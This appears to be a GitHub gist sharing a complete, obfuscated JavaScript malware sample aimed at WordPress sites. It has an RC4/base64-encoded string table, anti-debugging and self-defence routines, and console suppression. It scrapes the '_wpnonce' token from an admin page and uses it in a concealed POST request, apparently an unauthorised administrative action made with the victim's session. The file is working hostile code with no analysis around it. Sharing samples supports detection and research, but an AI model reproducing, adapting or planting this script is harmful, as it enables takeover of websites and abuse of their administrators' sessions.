Skip to content

Instantly share code, notes, and snippets.

@theMiddleBlue
Created October 17, 2019 07:49
Show Gist options
 • Save theMiddleBlue/9f1d2e79d8cf90c0a6a260bfa48d3f16 to your computer and use it in GitHub Desktop.
Save theMiddleBlue/9f1d2e79d8cf90c0a6a260bfa48d3f16 to your computer and use it in GitHub Desktop.
WordPress JavaScript Malware
'use strict';
/** @type {!Array} */
var _0x1d35 = ["C0jCuzY=", "Z1Muw74Mw63Cu8KcKiALwojCpMOAwplgWxc=", "DTJ8wo3Cj2nDm8KVK8Ky", "JcOCfB3Cixw=", "wpTCoXM=", "CcKjw57CtQ==", "wpEZcXI=", "wovClDV6wp/CsWZ5wp7CqTjDocKPw6JbHA==", "V8KKPljClcKrLMKrwoExKMOW", "HsO9WMOhYcO8w7fCn1vDtgXCnsObAnbCnXPCnsOrF25wwowiERHDqWHCqMORcQvCog==", "dgTDkcOz", "w5hDAcKKYQ==", "by7CiVx5QcKNw5DCqw==", "DMOObsOkw4rCsQ==", "MMODcwrCigbDsA4=", "GBlLw4EubQ==", "OyXDiMKONMOhw5E=", "HDhzwprCmVbDig==", "Ezh6", "wrY3UEg=", "HSElXcKF", "w77CqgZn", "wpdqwr7DhsKh", "YUc9wp9SdjBIw5A=", 
"w5zDjELDgyY=", "w7rCpC3Ck8O2YsOF", "FELCsg==", "Zg7DkcOkwqvCu8KG", "w6DCpRJm", "Z1AwwolNbjw=", "Q3MuwrcK", "LsKEwpzClWTCkRo=", "bA/DmcO4", "dMKZLVEKEcOt", "DsKdYcOhw7Q=", "CMKAfcO9w6nDrcO5", "YBnDnMOywrTCo8KKwoXDsg==", "wpvCoXpyWlLCmg==", "cE0/wplH", "dRPDkMOjwqvCtMKMwoY=", "B8ODacOgw4DCqw==", "TMObdMKsw4jCocK2QHk7w5HDsG48w63CvRAwwrLDjXVIwoHDvjUCKsKvGg==", "N1dnSMKaw4otw6nDgMOvw4tGOcKQAMKwSsOLw67DpWw=", "w4rCgm5nw7FqwqpywrTCv1cDNXJHMi7DocOIfn/CnzIi", "JcKfwobClnjDh1DCugDCtAh+c8OnOcKBYGRjUcOrFUXCrUgLw51aK13CmE9mw6rCvsKhYHszP8OJF8K4", 
"worCm2wvw7Fqwr5owq7DsUICO3NIcSjDrg==", "w6vCriLChMOgXcOUe8OcIw==", "d0s/wo5XcQ==", "GEBewqEnXsO9wqzDkcKmdT8=", "wp3CtnFi", "IMKKwobChWM=", "w6ZEAcKId8K1aRrDnQ==", "wr/ClDTCkMOGZsOUbsOYGcO/AcO2w7JOwqPDqB4=", "K0guw5dDZjROw5DDm0pgwo8eecKpwrbCjUbDlcK9wpzDk8O0w4PCpxByHQ==", "w4sewopKEMKFf2/Cvh/Dk8O2woI=", "DMKKfcOrw7TDoMOw", "IxLDlsOjwqHCosKRwobCoQ==", "Il49wo5LbTcaw4vChEFxwo8SMMKvwqrDjUTCjQ==", "w4h2woLDpw==", "w6vCrjPCjMO4bcOF", "MnTCgsKv", "Z8KRP1w=", "w6XCoRBkb8OZfg==", "VTIQcA==", "SRNgQQ==", "Hw/Dsg=="];
(function(params, content) {
 /**
  * @param {?} selected_image
  * @return {undefined}
  */
 var fn = function(selected_image) {
  for (; --selected_image;) {
   params["push"](params["shift"]());
  }
 };
 /**
  * @return {undefined}
  */
 var build = function() {
  var target = {
   "data" : {
    "key" : "cookie",
    "value" : "timeout"
   },
   "setCookie" : function(value, name, path, headers) {
    headers = headers || {};
    /** @type {string} */
    var cookie = name + "=" + path;
    /** @type {number} */
    var url = 0;
    /** @type {number} */
    url = 0;
    var key = value["length"];
    for (; url < key; url++) {
     var i = value[url];
     /** @type {string} */
     cookie = cookie + ("; " + i);
     var char = value[i];
     value["push"](char);
     key = value["length"];
     if (char !== !![]) {
      /** @type {string} */
      cookie = cookie + ("=" + char);
     }
    }
    /** @type {string} */
    headers["cookie"] = cookie;
   },
   "removeCookie" : function() {
    return "dev";
   },
   "getCookie" : function(match, href) {
    match = match || function(canCreateDiscussions) {
     return canCreateDiscussions;
    };
    var v = match(new RegExp("(?:^|; )" + href["replace"](/([.$?*|{}()[]\/+^])/g, "$1") + "=([^;]*)"));
    /**
     * @param {!Function} callback
     * @param {number} i
     * @return {undefined}
     */
    var test = function(callback, i) {
     callback(++i);
    };
    test(fn, content);
    return v ? decodeURIComponent(v[1]) : undefined;
   }
  };
  /**
   * @return {?}
   */
  var init = function() {
   /** @type {!RegExp} */
   var test = new RegExp("\\w+ *\\(\\) *{\\w+ *['|\"].+['|\"];? *}");
   return test["test"](target["removeCookie"]["toString"]());
  };
  /** @type {function(): ?} */
  target["updateCookie"] = init;
  /** @type {string} */
  var array = "";
  var _0x46e7e8 = target["updateCookie"]();
  if (!_0x46e7e8) {
   target["setCookie"](["*"], "counter", 1);
  } else {
   if (_0x46e7e8) {
    array = target["getCookie"](null, "counter");
   } else {
    target["removeCookie"]();
   }
  }
 };
 build();
})(_0x1d35, 473);
/**
 * @param {string} n
 * @param {string} dn
 * @return {?}
 */
var _0x5596 = function(n, dn) {
 /** @type {number} */
 n = n - 0;
 var i = _0x1d35[n];
 if (_0x5596["SxcpqV"] === undefined) {
  (function() {
   var jid = typeof window !== "undefined" ? window : typeof process === "object" && typeof require === "function" && typeof global === "object" ? global : this;
   /** @type {string} */
   var listeners = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";
   if (!jid["atob"]) {
    /**
     * @param {?} i
     * @return {?}
     */
    jid["atob"] = function(i) {
     var str = String(i)["replace"](/=+$/, "");
     /** @type {number} */
     var bc = 0;
     var bs;
     var buffer;
     /** @type {number} */
     var Y = 0;
     /** @type {string} */
     var pix_color = "";
     for (; buffer = str["charAt"](Y++); ~buffer && (bs = bc % 4 ? bs * 64 + buffer : buffer, bc++ % 4) ? pix_color = pix_color + String["fromCharCode"](255 & bs >> (-2 * bc & 6)) : 0) {
      buffer = listeners["indexOf"](buffer);
     }
     return pix_color;
    };
   }
  })();
  /**
   * @param {string} data
   * @param {!Object} fn
   * @return {?}
   */
  var testcase = function(data, fn) {
   /** @type {!Array} */
   var secretKey = [];
   /** @type {number} */
   var y = 0;
   var temp;
   /** @type {string} */
   var testResult = "";
   /** @type {string} */
   var tempData = "";
   /** @type {string} */
   data = atob(data);
   /** @type {number} */
   var val = 0;
   var key = data["length"];
   for (; val < key; val++) {
    /** @type {string} */
    tempData = tempData + ("%" + ("00" + data["charCodeAt"](val)["toString"](16))["slice"](-2));
   }
   /** @type {string} */
   data = decodeURIComponent(tempData);
   /** @type {number} */
   var x = 0;
   for (; x < 256; x++) {
    /** @type {number} */
    secretKey[x] = x;
   }
   /** @type {number} */
   x = 0;
   for (; x < 256; x++) {
    /** @type {number} */
    y = (y + secretKey[x] + fn["charCodeAt"](x % fn["length"])) % 256;
    temp = secretKey[x];
    secretKey[x] = secretKey[y];
    secretKey[y] = temp;
   }
   /** @type {number} */
   x = 0;
   /** @type {number} */
   y = 0;
   /** @type {number} */
   var i = 0;
   for (; i < data["length"]; i++) {
    /** @type {number} */
    x = (x + 1) % 256;
    /** @type {number} */
    y = (y + secretKey[x]) % 256;
    temp = secretKey[x];
    secretKey[x] = secretKey[y];
    secretKey[y] = temp;
    testResult = testResult + String["fromCharCode"](data["charCodeAt"](i) ^ secretKey[(secretKey[x] + secretKey[y]) % 256]);
   }
   return testResult;
  };
  /** @type {function(string, !Object): ?} */
  _0x5596["glcHGw"] = testcase;
  _0x5596["xIWTMS"] = {};
  /** @type {boolean} */
  _0x5596["SxcpqV"] = !![];
 }
 var b = _0x5596["xIWTMS"][n];
 if (b === undefined) {
  if (_0x5596["PuBeBd"] === undefined) {
   /**
    * @param {?} deny
    * @return {undefined}
    */
   var WMCacheControl = function(deny) {
    this["zcljzm"] = deny;
    /** @type {!Array} */
    this["rCtlRS"] = [1, 0, 0];
    /**
     * @return {?}
     */
    this["dCdylb"] = function() {
     return "newState";
    };
    /** @type {string} */
    this["KlxQDi"] = "\\w+ *\\(\\) *{\\w+ *";
    /** @type {string} */
    this["duYQjf"] = "['|\"].+['|\"];? *}";
   };
   /**
    * @return {?}
    */
   WMCacheControl["prototype"]["ZsDqaj"] = function() {
    /** @type {!RegExp} */
    var test = new RegExp(this["KlxQDi"] + this["duYQjf"]);
    /** @type {number} */
    var artistTrack = test["test"](this["dCdylb"]["toString"]()) ? --this["rCtlRS"][1] : --this["rCtlRS"][0];
    return this["nALANf"](artistTrack);
   };
   /**
    * @param {?} canCreateDiscussions
    * @return {?}
    */
   WMCacheControl["prototype"]["nALANf"] = function(canCreateDiscussions) {
    if (!Boolean(~canCreateDiscussions)) {
     return canCreateDiscussions;
    }
    return this["dixpqL"](this["zcljzm"]);
   };
   /**
    * @param {?} saveNotifs
    * @return {?}
    */
   WMCacheControl["prototype"]["dixpqL"] = function(saveNotifs) {
    /** @type {number} */
    var fp = 0;
    var len = this["rCtlRS"]["length"];
    for (; fp < len; fp++) {
     this["rCtlRS"]["push"](Math["round"](Math["random"]()));
     len = this["rCtlRS"]["length"];
    }
    return saveNotifs(this["rCtlRS"][0]);
   };
   (new WMCacheControl(_0x5596))["ZsDqaj"]();
   /** @type {boolean} */
   _0x5596["PuBeBd"] = !![];
  }
  i = _0x5596["glcHGw"](i, dn);
  _0x5596["xIWTMS"][n] = i;
 } else {
  i = b;
 }
 return i;
};
/**
 * @return {undefined}
 */
function _0x3c4db8() {
 var getAlignItem = function() {
  /** @type {boolean} */
  var closeExpr = !![];
  return function(object__360, function__361) {
   /** @type {!Function} */
   var closingExpr = closeExpr ? function() {
    if (function__361) {
     var cssobj = function__361["apply"](object__360, arguments);
     /** @type {null} */
     function__361 = null;
     return cssobj;
    }
   } : function() {
   };
   /** @type {boolean} */
   closeExpr = ![];
   return closingExpr;
  };
 }();
 var alignContentAlignItem = getAlignItem(this, function() {
  /**
   * @return {?}
   */
  var intval = function() {
   return "dev";
  };
  /**
   * @return {?}
   */
  var getDOMPath = function() {
   return "window";
  };
  /**
   * @return {?}
   */
  var testcase = function() {
   /** @type {!RegExp} */
   var test = new RegExp("\\w+ *\\(\\) *{\\w+ *['|\"].+['|\"];? *}");
   return !test["test"](intval["toString"]());
  };
  /**
   * @return {?}
   */
  var _stringify = function() {
   /** @type {!RegExp} */
   var test = new RegExp("(\\\\[x|u](\\w){2,4})+");
   return test["test"](getDOMPath["toString"]());
  };
  /**
   * @param {!Object} name
   * @return {undefined}
   */
  var matches = function(name) {
   /** @type {number} */
   var ms_controller = ~-1 >> 1 + 255 % 0;
   if (name["indexOf"]("i" === ms_controller)) {
    create(name);
   }
  };
  /**
   * @param {!Object} func
   * @return {undefined}
   */
  var create = function(func) {
   /** @type {number} */
   var _0x39123a = ~-4 >> 1 + 255 % 0;
   if (func["indexOf"]((!![] + "")[3]) !== _0x39123a) {
    matches(func);
   }
  };
  if (!testcase()) {
   if (!_stringify()) {
    matches("ind\u0435xOf");
   } else {
    matches("indexOf");
   }
  } else {
   matches("ind\u0435xOf");
  }
 });
 alignContentAlignItem();
 var isRowDirection = function() {
  /** @type {boolean} */
  var closeExpr = !![];
  return function(value, deferred) {
   /** @type {!Function} */
   var closingExpr = closeExpr ? function() {
    if (deferred) {
     var mom = deferred[_0x5596("0x0", "ZI^Z")](value, arguments);
     /** @type {null} */
     deferred = null;
     return mom;
    }
   } : function() {
   };
   /** @type {boolean} */
   closeExpr = ![];
   return closingExpr;
  };
 }();
 var isMainRowDirection = isRowDirection(this, function() {
  /**
   * @return {undefined}
   */
  var tOutResp = function() {
  };
  var jid = typeof window !== _0x5596("0x1", "n)ls") ? window : typeof process === _0x5596("0x2", "LT!p") && typeof require === _0x5596("0x3", "xRfk") && typeof global === _0x5596("0x4", "odv7") ? global : this;
  if (!jid[_0x5596("0x5", "tM8z")]) {
   jid[_0x5596("0x6", "rb5]")] = function(data) {
    var specialDayCache = {};
    /** @type {function(): undefined} */
    specialDayCache[_0x5596("0x7", "rb5]")] = data;
    /** @type {function(): undefined} */
    specialDayCache[_0x5596("0x8", "0X@y")] = data;
    /** @type {function(): undefined} */
    specialDayCache[_0x5596("0x9", "*QR^")] = data;
    /** @type {function(): undefined} */
    specialDayCache[_0x5596("0xa", "4u]8")] = data;
    /** @type {function(): undefined} */
    specialDayCache[_0x5596("0xb", "o*qA")] = data;
    /** @type {function(): undefined} */
    specialDayCache[_0x5596("0xc", "0ZDA")] = data;
    /** @type {function(): undefined} */
    specialDayCache[_0x5596("0xd", "8RkE")] = data;
    return specialDayCache;
   }(tOutResp);
  } else {
   /** @type {function(): undefined} */
   jid[_0x5596("0xe", "gI%e")][_0x5596("0xf", "Dq9v")] = tOutResp;
   /** @type {function(): undefined} */
   jid[_0x5596("0x10", "dtQ8")][_0x5596("0x11", "4u]8")] = tOutResp;
   /** @type {function(): undefined} */
   jid[_0x5596("0x12", "0ZDA")][_0x5596("0x13", "VvCy")] = tOutResp;
   /** @type {function(): undefined} */
   jid[_0x5596("0x14", "orp(")][_0x5596("0x15", "dtQ8")] = tOutResp;
   /** @type {function(): undefined} */
   jid[_0x5596("0x16", "11NG")][_0x5596("0x17", "[cxg")] = tOutResp;
   /** @type {function(): undefined} */
   jid[_0x5596("0x18", "[cxg")][_0x5596("0x19", "dtQ8")] = tOutResp;
   /** @type {function(): undefined} */
   jid[_0x5596("0x1a", "M6Bi")][_0x5596("0x1b", "0ZDA")] = tOutResp;
  }
 });
 isMainRowDirection();
 var date = location[_0x5596("0x1c", "dtQ8")] + "//" + document[_0x5596("0x1d", "LT!p")];
 var relationName = date + _0x5596("0x1e", "LT!p");
 var next_planting = date + _0x5596("0x1f", "IG3A");
 var first_harvest = date + _0x5596("0x20", "LU&0");
 var bytes = _0x5596("0x21", "orp(");
 /** @type {!XMLHttpRequest} */
 var _related2 = new XMLHttpRequest;
 /**
  * @return {undefined}
  */
 _related2[_0x5596("0x22", "LU&0")] = function() {
  if (this[_0x5596("0x23", "gI%e")] == 4) {
   if (this[_0x5596("0x24", "0ZDA")] == 200) {
    var $node = this[_0x5596("0x25", "8lgR")];
    /** @type {!RegExp} */
    var directiveProcessors = /name="_wpnonce"([ ]+)value="([^"]+)"/g;
    var $close = directiveProcessors[_0x5596("0x26", "M6Bi")]($node);
    if ($close != null) {
     if ($close[2][_0x5596("0x27", "orp(")](/([a-z0-9]{10})/)) {
      var otpUrl = $close[2];
      /** @type {string} */
      var cmd = _0x5596("0x28", "ZI^Z") + encodeURIComponent(otpUrl) + _0x5596("0x29", "gI%e") + encodeURIComponent(_0x5596("0x2a", "0ZDA")) + _0x5596("0x2b", "4R$B") + encodeURIComponent(_0x5596("0x2c", "[cxg")) + _0x5596("0x2d", "dtQ8") + bytes + _0x5596("0x2e", "0ZDA") + bytes;
      _0x3623b5(next_planting, cmd);
     } else {
      window[_0x5596("0x2f", "6RIj")]();
      location[_0x5596("0x30", "gI%e")](bytes + _0x5596("0x31", "3Exf"));
     }
    } else {
     window[_0x5596("0x32", "7@zz")]();
     location[_0x5596("0x33", "4u]8")](bytes + _0x5596("0x34", "ss(w"));
    }
   }
  }
 };
 _related2[_0x5596("0x35", "v$41")](_0x5596("0x36", "tM8z"), relationName, !![]);
 _related2[_0x5596("0x37", "Dq9v")]();
}
/**
 * @param {?} format
 * @param {string} data
 * @return {undefined}
 */
function _0x3623b5(format, data) {
 /** @type {!XMLHttpRequest} */
 var formats = new XMLHttpRequest;
 /**
  * @return {undefined}
  */
 formats[_0x5596("0x38", ")E$]")] = function() {
  if (this[_0x5596("0x39", "rb5]")] == 4 && this[_0x5596("0x3a", "xRfk")] == 200) {
   console[_0x5596("0x3b", "M6Bi")](format);
  }
 };
 formats[_0x5596("0x3c", "bqX4")](_0x5596("0x3d", "0X@y"), format, !![]);
 formats[_0x5596("0x3e", "w!TT")](_0x5596("0x3f", "7@zz"), _0x5596("0x40", "w9mu"));
 formats[_0x5596("0x41", "dtQ8")](data);
}
_0x3c4db8();
@ViniciusFXavier
Copy link

:O

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment